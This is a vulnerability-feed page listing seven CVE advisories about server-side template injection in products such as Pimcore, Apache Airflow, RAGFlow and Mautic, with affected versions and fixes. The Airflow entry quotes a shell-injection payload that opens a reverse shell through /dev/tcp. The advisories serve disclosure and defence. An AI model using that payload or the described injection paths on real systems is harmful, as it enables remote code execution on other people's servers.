Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.

Threats Tagged 'cwe-1336'

View all threats tagged with 'cwe-1336'. Filter and sort to focus on specific types of threats.

Pro Console Lifetime

Stop chasing alerts. Route them.

Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.

Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)

View Plans & Pricing

API access activates after upgrading in Console -> Billing.

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now

Filter Threats

Narrow down the results by type, severity, or affected countries

Search threats by title, CVE ID, or description. Maximum 100 characters.
Active filters (1):Tag: cwe-1336

Threats Tagged 'cwe-1336'

Click on any threat for detailed analysis and mitigation recommendations

CVE-2026-11407: CWE-1336 Improper Neutralization of Special Elements Used in a Template Engine in Pimcore GmbH Pimcore CMS/DXPCVE-2026-11407
0

Pimcore CMS/DXP version 12.3.8 contains a sandbox bypass vulnerability in its custom Twig SecurityPolicy. Authenticated administrative users can exploit empty checkMethodAllowed() and checkPropertyAllowed() implementations to execute arbitrary methods on PHP objects. This allows attackers to supply malicious Twig templates via the DataObject ClassDefinition Layout\Text component, enabling arbitrary file reads, database queries, and potentially remote code execution through PHP object gadget chains. The vulnerability is further widened by the pimcore_* function wildcard, which bypasses restrictions on all Pimcore Twig functions.

Join the discussion
CVE-2026-34906: CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine in Simple SA Wirtualna UczelniaCVE-2026-34906
0

Server-Side Template Injection (SSTI) in Wirtualna Uczelnia allows an unauthenticated attacker to perform Remote Code Execution (RCE). In the endpoint redirectToUrl and parameter redirectUrlParameter, insufficient input validation permits injection of arbitrary template expressions that are executed on the server. Successful exploitation can allow an attacker to run remote commands, including establishing a reverse shell. This issue affects Wirtualna Uczelnia versions up to wu#2016.437.295#0#20260327_105545

Join the discussion
CVE-2026-42252: CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine in Apache Software Foundation Apache AirflowCVE-2026-42252
0

Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.

Join the discussion
CVE-2026-45697: CWE-94: Improper Control of Generation of Code ('Code Injection') in verbb formieCVE-2026-45697
0

Formie is a Craft CMS plugin for creating forms. Prior to 2.2.20 and 3.1.24, unauthenticated users could submit crafted values into Hidden fields (with Default value → Custom) that were evaluated as Twig during submission handling, which could lead to serious compromise of the Craft site (depending on template/sandbox behavior). This vulnerability is fixed in 2.2.20 and 3.1.24.

Join the discussion
CVE-2026-49382: CWE-1336 in JetBrains IntelliJ IDEACVE-2026-49382
0

CVE-2026-49382 is a medium severity vulnerability in JetBrains IntelliJ IDEA before version 2026.1. It involves code execution via template injection in the Copyright plugin. The vulnerability has a CVSS 3.1 base score of 4.5, indicating limited impact with high attack complexity and required user interaction. No official patch or remediation guidance is currently provided by the vendor. There are no known exploits in the wild at this time.

Join the discussion
CVE-2026-45312: CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine in infiniflow ragflowCVE-2026-45312
0

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In 0.24.0 and earlier, a Jinja2 template injection in the prompt generator (rag/prompts/generator.py) allows any authenticated user to execute arbitrary OS commands on the server. Any normal user can register, create a Canvas workflow with a DuckDuckGo + LLM component chain, and trigger the SSTI.

Join the discussion
CVE-2026-9558: CWE-1336 Improper Neutralization of Special Elements Used in a Template EngineCVE-2026-9558
0

A Server-Side Template Injection (SSTI) vulnerability exists in Mautic's theme engine. The platform renders uploaded Twig templates without a sandbox or strict function restrictions. Authenticated users with permissions to create or upload themes can abuse this to execute arbitrary code on the hosting server (Remote Code Execution) or access restricted system files and configuration settings.

Join the discussion

Showing 1 to 7 of 7 results

Filters:Tag: cwe-1336
Page 1 of 1
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses